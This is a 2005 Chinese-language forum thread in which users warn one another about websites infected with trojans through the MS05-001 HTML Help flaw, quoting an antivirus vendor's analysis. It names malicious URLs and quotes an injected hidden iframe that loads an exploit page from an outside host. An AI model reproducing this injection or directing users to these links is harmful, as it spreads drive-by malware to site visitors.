真正的位置在這邊....
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"
可列印頁面
真正的位置在這邊....
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"
用 FireFox 不需要擔心啦。
用戶端的應該是利用這個漏洞的。
[url]http://www.microsoft.com/taiwan/security/bulletin/MS05-001.mspx[/url]
Microsoft 安全性公告 MS05-001
HTML Help 說明檔的弱點可能會允許程式碼執行 (890175)
記得去修補 IE 漏洞。
另外,好心一點的就寫 email 去告訴它們網站客服人員,或去留言版留個言提醒一下吧。
最近已經碰過不少的 MS IIS + ASP 站台都中毒中木馬到不知不覺了。
PS: 用 FireFox 的,你會在頁面左上角看到一個奇怪的符號跟數字 1 之類的。那個就是隱藏的病毒網頁 count.htm 執行後的結果。用IE的看不到。
KB890175就算是有安裝了SP2也是要更新喔! :)
我也是在tcr這網站中木馬的大家千萬不要去
今天微軟更新了2月份的patch後不知道這個漏洞解掉沒?
[QUOTE=yuping]今天微軟更新了2月份的patch後不知道這個漏洞解掉沒?[/QUOTE]
好像沒有。我是不是中毒了啊。 :|||:
[IMG]http://img213.exs.cx/img213/9092/200502100gq.jpg[/IMG]
F-Secure Corporation 的回答
==================================
Thanks for your report. We have checked the website and found a CHM
file that
drops a trojan downloader. This trojan downloader hiddenly downloads
and run
another executable file which is detected as follows:
--------------------------------------------------------------
Scanning Report
10 February 2005 15:50:02 - 15:50:09
Target: C:\1
Result: 1 virus found
* C:\1\setup.ex Infection: Trojan-PSW.Win32.Lineage.ah Action:
Renamed.
--------------------------------------------------------------
We will file the abuse report about the download site and add detection
for
the trojan downloader.
Regards,
現在有哪幾家防毒掃得到的呢?
[url]http://www.papago.com.tw/[/url]
這個網站似乎也被植入木馬
進去討論區KAV就跳出了
-----
原始碼怎麼看不到它插入的CSS?
[QUOTE=darren2000][url]http://www.papago.com.tw/[/url]
這個網站似乎也被植入木馬
進去討論區KAV就跳出了
-----
原始碼怎麼看不到它插入的CSS?[/QUOTE]
沒錯!http://www.mactiontech.com/big5/board/board.asp
程式碼<iframe width=0 height=0 src=http://www.szadk.com/new.htm></iframe>
kav偵測為 new.htm - infected by Exploit.VBS.Phel.c